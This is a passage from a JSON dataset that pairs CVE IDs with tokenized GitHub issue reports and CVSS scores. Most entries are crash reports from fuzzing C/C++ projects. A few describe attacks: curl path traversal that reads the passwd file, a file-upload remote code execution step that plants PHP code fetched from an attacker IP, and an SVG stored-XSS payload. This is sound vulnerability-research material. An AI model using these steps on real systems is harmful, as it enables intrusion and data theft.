        "description": "FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-32138",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1767",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1767",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-04-30T00:45:19Z",
        "description": "null dereference in APITAG APITAG Hi, There is a null dereference issue in gpac APITAG APITAG can reproduce on the lattest commit. Steps To Reproduce build: APITAG run as: APITAG shows the following log: ERRORTAG Reporter NUMBERTAG n1p3r NUMBERTAG from Topsec Alpha Lab FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-32139",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1768",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1768",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-04-30T00:46:26Z",
        "description": "null dereference in gpac APITAG gf_isom_vp_config_get. Hi, There is a null dereference issue in gpac APITAG gf_isom_vp_config_get,this can reproduce on the lattest commit. Steps To Reproduce build: APITAG run as: APITAG shows the following log: ERRORTAG Reporter NUMBERTAG n1p3r NUMBERTAG from Topsec Alpha Lab FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-3223",
        "Issue_Url_old": "https://github.com/node-red/node-red-dashboard/issues/669",
        "Issue_Url_new": "https://github.com/node-red/node-red-dashboard/issues/669",
        "Repo_new": "node-red/node-red-dashboard",
        "Issue_Created_At": "2021-01-11T04:39:02Z",
        "description": "Path traversal . In FILETAG , the URL is matched PATHTAG ' and then passed to APITAG The lack of verification of the final path leads to a path traversal vulnerability. We can use this vulnerability to read sensitive data on the server, such as FILETAG . What are the steps to reproduce NUMBERTAG Install node red dashboard on node red server NUMBERTAG curl PATHTAG What happens? The server returns the passwd file content What do you expect to happen? ERRORTAG Please tell us about your environment: [x] Node RED Dashboard version NUMBERTAG Node RED version NUMBERTAG FILETAG version: APITAG [x] npm version NUMBERTAG Platform/OS: linux [ ] Browser: None",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-3224",
        "Issue_Url_old": "https://github.com/cskaza/cszcms/issues/28",
        "Issue_Url_new": "https://github.com/cskaza/cszcms/issues/28",
        "Repo_new": "cskaza/cszcms",
        "Issue_Created_At": "2021-01-13T02:19:45Z",
        "description": "Stored XSS Vulnerability In PATHTAG APITAG Hi\uff0c MENTIONTAG I found a Stored XSS Vulnerability In PATHTAG APITAG In content page APITAG content Parameter are not filtered\uff1a FILETAG FILETAG POC:a\u201d> APITAG FILETAG FILETAG FILETAG FILETAG FILETAG Author:leerina",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2021-32243",
        "Issue_Url_old": "https://github.com/FOGProject/fogproject/issues/422",
        "Issue_Url_new": "https://github.com/fogproject/fogproject/issues/422",
        "Repo_new": "fogproject/fogproject",
        "Issue_Created_At": "2021-04-29T11:39:10Z",
        "description": "APITAG NUMBERTAG File Upload RCE APITAG NUMBERTAG Create an empty NUMBERTAG Mb file. dd PATHTAG of=myshell bs NUMBERTAG count NUMBERTAG Add your PHP code to the end of the file created in the step NUMBERTAG echo ' APITAG ' >> myshell NUMBERTAG Put the file \"myshell\" accessible through HTTP. $ cp myshell PATHTAG NUMBERTAG Encode the URL to get \"myshell\" file to base NUMBERTAG APITAG Attacker IP). $ echo \" URLTAG \" | base NUMBERTAG APITAG NUMBERTAG isit URLTAG Example: URLTAG NUMBERTAG Appears a textbox, change the Kernel Name APITAG to FILETAG and click on Install NUMBERTAG isit URLTAG execute system whoami command",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-32245",
        "Issue_Url_old": "https://github.com/pagekit/pagekit/issues/963",
        "Issue_Url_new": "https://github.com/pagekit/pagekit/issues/963",
        "Repo_new": "pagekit/pagekit",
        "Issue_Created_At": "2021-04-30T08:11:10Z",
        "description": "A stored XSS has been found in APITAG CMS affecting versions NUMBERTAG Problem A user can upload SVG files in the file upload portion of the CMS. These SVG files can contain malicious scripts. This file will be uploaded to the system and it will not be stripped or filtered. The user can create a link on the website pointing to PATHTAG that will point to FILETAG When a user comes along to click that link, it will trigger a XSS attack. exp.svg APITAG APITAG APITAG APITAG APITAG alert(/xss/); APITAG APITAG Technical Details Pagekit version NUMBERTAG Webserver: APITAG Database: APITAG PHP Version NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2021-32263",
        "Issue_Url_old": "https://github.com/brackeen/ok-file-formats/issues/13",
        "Issue_Url_new": "https://github.com/brackeen/ok-file-formats/issues/13",
        "Repo_new": "brackeen/ok-file-formats",
        "Issue_Created_At": "2021-04-29T11:33:39Z",
        "description": "heap buffer overflow in APITAG at APITAG Description A heap buffer overflow was discovered in ok_file_formats. The issue is being triggered in function APITAG at APITAG Version dev version, git clone FILETAG Environment Ubuntu NUMBERTAG bit Reproduce test program ERRORTAG Compile test program with Address Sanitizer: APITAG Asan Report ERRORTAG APITAG FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-32268",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1587",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1587",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2020-09-04T15:05:21Z",
        "description": "A heap buffer overflow in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), APITAG (latest master NUMBERTAG a NUMBERTAG e URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure static mp4box Command line PATHTAG disox ttxt NUMBERTAG dump chap ogg dump cover drtp bt out /dev/null APITAG APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-32269",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1574",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1574",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2020-08-13T03:20:26Z",
        "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), APITAG (latest master NUMBERTAG aa NUMBERTAG URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure static mp4box Command line PATHTAG diso out /dev/null APITAG APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-32270",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1586",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1586",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2020-09-04T14:58:11Z",
        "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), APITAG (latest master NUMBERTAG a NUMBERTAG e URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure static mp4box Command line PATHTAG diso out /dev/null APITAG APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-32271",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1575",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1575",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2020-08-15T01:36:37Z",
        "description": "A stack buffer overflow in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), APITAG (latest master NUMBERTAG aa NUMBERTAG URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure static mp4box Command line PATHTAG diso NUMBERTAG d diod latm keep utc out /dev/null APITAG APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-32272",
        "Issue_Url_old": "https://github.com/knik0/faad2/issues/57",
        "Issue_Url_new": "https://github.com/knik0/faad2/issues/57",
        "Repo_new": "knik0/faad2",
        "Issue_Created_At": "2020-08-30T15:27:09Z",
        "description": "A heap buffer overflow in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG faad (latest master NUMBERTAG ae URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure enable shared=no Command line PATHTAG w b NUMBERTAG APITAG APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-32273",
        "Issue_Url_old": "https://github.com/knik0/faad2/issues/56",
        "Issue_Url_new": "https://github.com/knik0/faad2/issues/56",
        "Repo_new": "knik0/faad2",
        "Issue_Created_At": "2020-08-16T07:27:58Z",
        "description": "A stack buffer overflow in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG faad (latest master eb NUMBERTAG fa URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure enable shared=no Command line PATHTAG w b NUMBERTAG APITAG APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-32274",
        "Issue_Url_old": "https://github.com/knik0/faad2/issues/60",
        "Issue_Url_new": "https://github.com/knik0/faad2/issues/60",
        "Repo_new": "knik0/faad2",
        "Issue_Created_At": "2020-08-30T15:53:54Z",
        "description": "A heap buffer overflow in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG faad (latest master NUMBERTAG ae URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure enable shared=no Command line PATHTAG w b NUMBERTAG APITAG APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-32275",
        "Issue_Url_old": "https://github.com/grame-cncm/faust/issues/482",
        "Issue_Url_new": "https://github.com/grame-cncm/faust/issues/482",
        "Repo_new": "grame-cncm/faust",
        "Issue_Created_At": "2020-08-26T02:30:17Z",
        "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG faust (latest master c NUMBERTAG d2 URLTAG Configure cmake . DCMAKE_CXX_FLAGS=\" fsanitize=address g\" DCMAKE_C_FLAGS=\" fsanitize=address g\" DCMAKE_EXE_LINKER_FLAGS=\" fsanitize=address\" DINCLUDE_STATIC=on DINCLUDE_HTTP=off DINCLUDE_OSC=off Command line PATHTAG lang ocpp o /tmp/faust e lcc exp NUMBERTAG lb rb mem sd APITAG APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-32276",
        "Issue_Url_old": "https://github.com/knik0/faad2/issues/58",
        "Issue_Url_new": "https://github.com/knik0/faad2/issues/58",
        "Repo_new": "knik0/faad2",
        "Issue_Created_At": "2020-08-30T15:29:51Z",
        "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG faad (latest master NUMBERTAG ae URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure enable shared=no Command line PATHTAG w b NUMBERTAG APITAG APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-32277",
        "Issue_Url_old": "https://github.com/knik0/faad2/issues/59",
        "Issue_Url_new": "https://github.com/knik0/faad2/issues/59",
        "Repo_new": "knik0/faad2",
        "Issue_Created_At": "2020-08-30T15:32:46Z",
        "description": "A heap buffer overflow in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG faad (latest master NUMBERTAG ae URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure enable shared=no Command line PATHTAG w b NUMBERTAG APITAG APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-32278",
        "Issue_Url_old": "https://github.com/knik0/faad2/issues/62",
        "Issue_Url_new": "https://github.com/knik0/faad2/issues/62",
        "Repo_new": "knik0/faad2",
        "Issue_Created_At": "2020-09-04T14:47:28Z",
        "description": "A heap buffer overflow in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG faad (latest master f NUMBERTAG b5e URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure enable shared=no Command line PATHTAG w b NUMBERTAG APITAG APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-32281",
        "Issue_Url_old": "https://github.com/marcobambini/gravity/issues/313",
        "Issue_Url_new": "https://github.com/marcobambini/gravity/issues/313",
        "Repo_new": "marcobambini/gravity",
        "Issue_Created_At": "2020-08-07T04:58:06Z",
        "description": "A heap buffer overflow in APITAG can cause abort. System info Ubuntu NUMBERTAG clang NUMBERTAG gravity (latest master ecbee9f URLTAG Configure cmake .. DCMAKE_CXX_FLAGS=\" fsanitize=address g\" DCMAKE_C_FLAGS=\" fsanitize=address g\" DCMAKE_EXE_LINKER_FLAGS=\" fsanitize=address\" Command line PATHTAG o /tmp/grav q c APITAG Output ERRORTAG APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-32282",
        "Issue_Url_old": "https://github.com/marcobambini/gravity/issues/315",
        "Issue_Url_new": "https://github.com/marcobambini/gravity/issues/315",
        "Repo_new": "marcobambini/gravity",
        "Issue_Created_At": "2020-08-07T14:09:43Z",
        "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG gravity (latest master ecbee9f URLTAG Configure cmake .. DCMAKE_CXX_FLAGS=\" fsanitize=address g\" DCMAKE_C_FLAGS=\" fsanitize=address g\" DCMAKE_EXE_LINKER_FLAGS=\" fsanitize=address\" Command line PATHTAG o /tmp/grav q c APITAG Output Segmentation fault APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-32283",
        "Issue_Url_old": "https://github.com/marcobambini/gravity/issues/314",
        "Issue_Url_new": "https://github.com/marcobambini/gravity/issues/314",
        "Repo_new": "marcobambini/gravity",
        "Issue_Created_At": "2020-08-07T14:07:36Z",
        "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG gravity (latest master ecbee9f URLTAG Configure cmake .. DCMAKE_CXX_FLAGS=\" fsanitize=address g\" DCMAKE_C_FLAGS=\" fsanitize=address g\" DCMAKE_EXE_LINKER_FLAGS=\" fsanitize=address\" Command line PATHTAG o /tmp/grav q c APITAG Output Segmentation fault APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-32284",
        "Issue_Url_old": "https://github.com/marcobambini/gravity/issues/321",
        "Issue_Url_new": "https://github.com/marcobambini/gravity/issues/321",
        "Repo_new": "marcobambini/gravity",
        "Issue_Created_At": "2020-08-30T16:46:44Z",
        "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG gravity (latest master c NUMBERTAG e NUMBERTAG URLTAG Configure cmake .. DCMAKE_CXX_FLAGS=\" fsanitize=address g\" DCMAKE_C_FLAGS=\" fsanitize=address g\" DCMAKE_EXE_LINKER_FLAGS=\" fsanitize=address\" Command line PATHTAG APITAG APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-32285",
        "Issue_Url_old": "https://github.com/marcobambini/gravity/issues/319",
        "Issue_Url_new": "https://github.com/marcobambini/gravity/issues/319",
        "Repo_new": "marcobambini/gravity",
        "Issue_Created_At": "2020-08-30T16:37:45Z",
        "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG gravity (latest master c NUMBERTAG e NUMBERTAG URLTAG Configure cmake .. DCMAKE_CXX_FLAGS=\" fsanitize=address g\" DCMAKE_C_FLAGS=\" fsanitize=address g\" DCMAKE_EXE_LINKER_FLAGS=\" fsanitize=address\" Command line PATHTAG APITAG APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-32286",
        "Issue_Url_old": "https://github.com/ZerBea/hcxtools/issues/155",
        "Issue_Url_new": "https://github.com/zerbea/hcxtools/issues/155",
        "Repo_new": "zerbea/hcxtools",
        "Issue_Created_At": "2020-08-12T03:09:27Z",
        "description": "A memcpy param overlap in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG hcxpcapngtool (latest master e6b NUMBERTAG URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" make Command line ./hcxpcapngtool all o /dev/null APITAG APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-32287",
        "Issue_Url_old": "https://github.com/nokiatech/heif/issues/86",
        "Issue_Url_new": "https://github.com/nokiatech/heif/issues/86",
        "Repo_new": "nokiatech/heif",
        "Issue_Created_At": "2020-08-04T07:58:10Z",
        "description": "A global buffer overflow in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), heif (latest master NUMBERTAG fc NUMBERTAG e URLTAG Configure cmake ../srcs DCMAKE_CXX_FLAGS=\" fsanitize=address g\" DCMAKE_C_FLAGS=\" fsanitize=address g\" DCMAKE_EXE_LINKER_FLAGS=\" fsanitize=address\" Command line modify APITAG use APITAG to receive filename from commandline. PATHTAG APITAG APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-32288",
        "Issue_Url_old": "https://github.com/nokiatech/heif/issues/87",
        "Issue_Url_new": "https://github.com/nokiatech/heif/issues/87",
        "Repo_new": "nokiatech/heif",
        "Issue_Created_At": "2020-08-04T14:03:20Z",
        "description": "A global buffer overflow in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), heif (latest master NUMBERTAG fc NUMBERTAG e URLTAG Configure cmake ../srcs DCMAKE_CXX_FLAGS=\" fsanitize=address g\" DCMAKE_C_FLAGS=\" fsanitize=address g\" DCMAKE_EXE_LINKER_FLAGS=\" fsanitize=address\" Command line modify APITAG use APITAG to receive filename from command line. PATHTAG APITAG APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-32289",
        "Issue_Url_old": "https://github.com/nokiatech/heif/issues/85",
        "Issue_Url_new": "https://github.com/nokiatech/heif/issues/85",
        "Repo_new": "nokiatech/heif",
        "Issue_Created_At": "2020-08-04T07:55:57Z",
        "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), heif (latest master NUMBERTAG fc NUMBERTAG e URLTAG Configure cmake ../srcs DCMAKE_CXX_FLAGS=\" fsanitize=address g\" DCMAKE_C_FLAGS=\" fsanitize=address g\" DCMAKE_EXE_LINKER_FLAGS=\" fsanitize=address\" Command line modify APITAG use APITAG to receive filename from commandline. PATHTAG APITAG Output Segmentation fault APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-32294",
        "Issue_Url_old": "https://github.com/drbye78/libgig/issues/1",
        "Issue_Url_new": "https://github.com/drbye78/libgig/issues/1",
        "Repo_new": "drbye78/libgig",
        "Issue_Created_At": "2020-08-15T14:27:18Z",
        "description": "A heap buffer overflow in APITAG The User account creation has been disabled in Bugzilla, so I have to report it here. System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), gigextract (latest master NUMBERTAG fd8 URLTAG Command line PATHTAG APITAG /tmp/libgig APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-32297",
        "Issue_Url_old": "https://github.com/lief-project/LIEF/issues/449",
        "Issue_Url_new": "https://github.com/lief-project/lief/issues/449",
        "Repo_new": "lief-project/lief",
        "Issue_Created_At": "2020-08-07T13:04:22Z",
        "description": "A heap overflow in APITAG (not issue in the library). System info Ubuntu NUMBERTAG gcc, pe_reader (latest master NUMBERTAG bbe NUMBERTAG URLTAG Configure cmake .. DCMAKE_CXX_FLAGS=\" fsanitize=address g\" DCMAKE_C_FLAGS=\" fsanitize=address g\" DCMAKE_EXE_LINKER_FLAGS=\" fsanitize=address\" Command line PATHTAG APITAG APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-32298",
        "Issue_Url_old": "https://github.com/svanderburg/libiff/issues/10",
        "Issue_Url_new": "https://github.com/svanderburg/libiff/issues/10",
        "Repo_new": "svanderburg/libiff",
        "Issue_Created_At": "2020-08-04T06:53:28Z",
        "description": "A global buffer overflow in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), iffpp (latest master NUMBERTAG be4 URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure Command line PATHTAG APITAG Output APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-32299",
        "Issue_Url_old": "https://github.com/mmp/pbrt-v3/issues/296",
        "Issue_Url_new": "https://github.com/mmp/pbrt-v3/issues/296",
        "Repo_new": "mmp/pbrt-v3",
        "Issue_Created_At": "2020-08-04T08:57:10Z",
        "description": "A stack buffer overflow in APITAG with default test case. System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), pbrt (latest master aaa NUMBERTAG URLTAG Configure cmake ../srcs DCMAKE_CXX_FLAGS=\" fsanitize=address g\" DCMAKE_C_FLAGS=\" fsanitize=address g\" DCMAKE_EXE_LINKER_FLAGS=\" fsanitize=address\" Command line PATHTAG quick PATHTAG outfile /tmp/pbrt APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-3242",
        "Issue_Url_old": "https://github.com/duxphp/DuxCMS3/issues/4",
        "Issue_Url_new": "https://github.com/duxphp/duxcms3/issues/4",
        "Repo_new": "duxphp/duxcms3",
        "Issue_Created_At": "2021-01-17T02:07:36Z",
        "description": "backend sql injection vulnerability. sql injection vulnerability exists in tools APITAG module, url is PATHTAG please check FILETAG NUMBERTAG more details in URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-32434",
        "Issue_Url_old": "https://github.com/leesavide/abcm2ps/issues/83",
        "Issue_Url_new": "https://github.com/lewdlime/abcm2ps/issues/83",
        "Repo_new": "lewdlime/abcm2ps",
        "Issue_Created_At": "2021-04-27T02:14:17Z",
        "description": "Out of bounds read in APITAG in calculate_beam. In function APITAG in draw.c . There is out of bounds read in array min_tb at line NUMBERTAG and NUMBERTAG the flaw will cause crash. ERRORTAG The (unsigned) s >nflags can be checked whether between NUMBERTAG and NUMBERTAG I am not sure what the APITAG means so i didn't try to fix it. gdb info: ERRORTAG reproduce: APITAG FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-32435",
        "Issue_Url_old": "https://github.com/leesavide/abcm2ps/issues/84",
        "Issue_Url_new": "https://github.com/lewdlime/abcm2ps/issues/84",
        "Repo_new": "lewdlime/abcm2ps",
        "Issue_Created_At": "2021-04-27T03:41:52Z",
